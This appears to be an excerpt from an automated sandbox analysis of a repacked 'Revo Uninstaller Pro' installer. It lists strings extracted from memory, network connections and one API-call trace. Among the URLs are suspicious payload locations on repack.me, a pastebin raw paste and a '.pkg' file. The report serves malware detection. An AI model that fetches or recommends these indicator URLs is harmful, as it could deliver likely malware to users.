        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0=
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1630444927.000000000AA62000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000000.1403909400.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0W
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repacks.ddns.nethttps://repack.me/ad.htmlopen
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repacks.ddns.netopen
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/http/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/SV
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc1321
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4648S
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.Licence-Protector.com
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.animation.arthouse.org
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/rootpart.xml
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.color.org
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ebgo.net10C763608-E632-4CB3-BE88-FD96CB346ADF6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ebgo.net10FE506D4-2806-4275-9DE4-E0F9AF59DF035.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ebgo.net10FE506D4-2806-4275-9DE4-E0F9AF59DF035.1CDKeyExtractor
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ebgo.net1210AFEF9-4CF5-4E40-904C-344F600519D96.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ebgo.net193C3DE25-405D-440F-827C-C8A82C1E44566.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ebgo.net193C3DE25-405D-440F-827C-C8A82C1E44566.1CDKeyExtractor
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc3447.txtS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.itl.nist.gov/fipspubs/fip180-1.htm
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mirage-systems.de/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mirage-systems.de/%operationName%
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.movable-type.co.uk/scripts/xxtea.pdfS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.revouninstaller.com
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.revouninstaller.com/)
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.schneier.com/paper-blowfish-fse.htmlS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.schneier.com/paper-twofish-paper.pdfS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vsrevogroup.com
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.word-pdf-converter.com/5.67B160777-E232-46C5-8DC0-5BC8B49E77496.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
        Source: setup.exe, 0000001D.00000003.2150919335.000000000180D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://features.opera-api2.com/api/v2/features?country=US&language=en-GB&uuid=ef78c5bf-264b-4601-87
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1844157074.00000000009AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/Kj
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1844375697.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809493894.00000000009C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkg
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkg2iq
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkgto
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809493894.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159897408.0000000000971000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809764960.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9B
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9BD
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9Bget8191
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159897408.0000000000971000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809764960.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9Bm
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repack.me/ad.html
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/buy-update-subscription-btn/https://www.revouninstaller.com/buy-now-
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/contact-us/C:
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/downloads-manager/?filename=pro-%shttps://www.revouninstaller.com/up
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/feedback/?product=pro
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/feedback/?product=pro%d-%d-%dLast
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/Software
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/revo-uninstaller-pro-full-version-history/)
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/support/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/updatepro5.xmlhttps://www.revouninstaller.com/downloads-manager/?fil
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.comAffHomewww.revouninstaller.comwww.revouninstallerpro.com
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstallerpro.com/db/ilogs/.ruelDelete
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstallerpro.com/db/ilogs/Uninstaller
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.9:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 194.87.189.43:443 -> 192.168.2.9:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.167.96.30:443 -> 192.168.2.9:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.167.96.38:443 -> 192.168.2.9:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.167.96.39:443 -> 192.168.2.9:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.167.125.189:443 -> 192.168.2.9:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.167.110.216:443 -> 192.168.2.9:49718 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.167.96.36:443 -> 192.168.2.9:49719 version: TLS 1.2
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00405866 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405866
